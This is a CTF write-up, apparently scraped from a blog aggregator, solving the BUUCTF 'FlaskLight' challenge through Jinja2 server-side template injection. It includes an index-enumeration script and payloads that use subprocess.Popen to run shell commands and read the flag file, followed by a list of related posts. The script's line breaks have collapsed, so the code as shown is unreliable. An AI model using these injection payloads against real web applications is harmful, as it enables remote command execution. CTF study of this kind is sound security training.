BUUCTF:[CSCCTF 2019 Qual]FlaskLight
题目地址:https://buuoj.cn/challenges#[CSCCTF%202019%20Qual]FlaskLight
?search={{7*7}}
#通过回显判断SSTI
?search={{''.__class__.__mro__[2].__subclasses__()}}
#爆出所有类
编写脚本查找可利用的类
利用subprocess.Popen执行命令
import requests
import re
import html
import timeindex = 0
for i in range(170, 1000):try:url = "http://17ad255a-204e-4624-b878-e3e0d62e526a.node3.buuoj.cn/?search={{''.__class__.__mro__[2].__subclasses__()[" + str(i) + "]}}"r = requests.get(url)res = re.findall("<h2>You searched for:<\/h2>\W+<h3>(.*)<\/h3>", r.text)time.sleep(0.1)# print(res)# print(r.text)res = html.unescape(res[0])print(str(i) + " | " + res)if "subprocess.Popen" in res:index = ibreakexcept:continue
print("indexo of subprocess.Popen:" + str(index))
?search={{''.__class__.__mro__[2].__subclasses__()[258]('ls',shell=True,stdout=-1).communicate()[0].strip()}}?search={{''.__class__.__mro__[2].__subclasses__()[258]('ls /flasklight',shell=True,stdout=-1).communicate()[0].strip()}}?search={{''.__class__.__mro__[2].__subclasses__()[258]('cat /flasklight/coomme_geeeett_youur_flek',shell=True,stdout=-1).communicate()[0].strip()}}
原文作者:D15h35
链接:https://yanmymickey.github.io/2020/04/15/CTFwp/%5BCSCCTF%202019%20Qual%5DFlaskLight/
BUUCTF:[CSCCTF 2019 Qual]FlaskLight相关推荐
- [CSCCTF 2019 Qual] FlaskLight
信息收集 index大致就这样,没什么信息 F12看下,发现了线索:search参数 试下ssti 基本就是ssti了 漏洞利用 config 也是 Flask模版中的一个全局对象,它包含了所有应用程 ...
- 一道[CSCCTF 2019 Qual]FlaskLight的详解再遇SSTI
目录 SSTI 无二次渲染的示例 存在二次渲染的示例 漏洞复现 [CSCCTF 2019 Qual]FlaskLight 做这道题的时候,再次深入了解了一下SSTI,不过发现去讲解这题原理的文章实在是 ...
- [CSCCTF 2019 Qual]FlaskLight——直取flag?
[CSCCTF 2019 Qual]FlaskLight 前言 白天一直在上课,晚上赶快躲进图书馆里面打打靶场.这次的题目算是很简单的一道题目了,我做完之后还去看了看其他师傅写的博客,只能感叹一声太强 ...
- ssti练习之[CSCCTF 2019 Qual]FlaskLight 1
[CSCCTF 2019 Qual]FlaskLight 1 查看网页源代码,发现里面的提示 尝试输入url http://e1f8bf68-fab7-482f-901b-12c336d1cdeb.n ...
- [CSCCTF 2019 Qual]FlaskLight SSTI注入
进去后页面提示你是flask框架,f12里面告诉你参数名字叫做search并且用GET方法传输,十有八九是模块注入了,用7*7试试服务端模板注入攻击 - 知乎 可以发现在searched后面输出了49 ...
- [CSCCTF 2019 Qual]FlaskLight 记录
这个根据题目名字,flask模板注入,找注入点 查看源码发现GET传参 直接测试模板注入 常规模板注入 试了试之前做过的模板注入,都行不通 然后百度了一波,原来这是python2的 难怪不行 {{'' ...
- BUUCTF:[SUCTF 2019]Game
https://buuoj.cn/challenges#[SUCTF%202019]Game index.html中发现一串base32 >>> import base64 > ...
- BUUCTF:[watevrCTF 2019]Evil Cuteness
题目地址:https://buuoj.cn/challenges#[watevrCTF%202019]Evil%20Cuteness binwalk分析,发现zip压缩包,使用dd命令分离提取压缩包 ...
- 逆向迷宫题总结(持续更新) 2020华南师大CTF新生赛maze,攻防世界新手区:NJUPT CTF 2017,BUUCTF:不一样的flag
CTF逆向入门:迷宫题学习记录(持续更新) ** 目录 **CTF逆向入门:迷宫题学习记录(持续更新)** (前言) 一. 逆向迷宫题概述 二. 具体题目分析 1. 2019华南师大CTF新生赛maz ...
最新文章
- linux的裁剪过程,让你的小linux更加完善,赶快试试吧!
- Red Hat Linux 挂载外部资源
- 计算机网络第4版潘爱民_学术活动 钱江会计实务精英讲坛预告(第84期)| 何继昌 : 战略视角下之财务分析应用实践 兼选股案例分享...
- 【STM32】位带原理分析和应用
- 我的Go语言学习之旅七:创建一个GUI窗体
- vue echarts div变化_数据可视化之echarts在Vue中的使用
- 自立,霸者的生存之道
- Docker 管理之 --- 资源限制
- hive查询数据库总条数
- js数组倒序reverse
- 虚拟机的不同网络模式
- 1193 Eason
- paperswithcode使用方法
- 英语作文计算机用途80词,初3英语作文_关于介绍电脑的英语作文,初三,80词左右。急!!!...
- Kubernetes - CPU 单位
- Ubuntu安装常用Linux桌面系统
- 从平台到中台 | Elasticsearch 在蚂蚁金服的实践经验
- python中变量无须先创建和赋值而直接使用_python综合练习1
- oracle中spool命令的使用,Oracle中Spool命令的使用方法实例
- android layout_gravity gravity
热门文章
- vSphere 6.5配置使用vMotion高级特性
- c语言调色板5个参数,R语言中的颜色以及色板
- 数电与、或、非、与非、或非、与或、同或
- idea如何设置代理实现管理突破呢
- Python:学习成绩管理系统
- [Centos7]Mirai QQ机器人监听播报TeamSpeak3用户状态
- 漫游测试之性能测试(5.4-执行计划)
- 品悟C 抛弃C程序设计中的谬误与恶习 pdf
- R语言心得说:R语言之xlsx包读写Excel数据
- 5.9.1_P163《C++ Primer Plus (6th)》编程练习 答案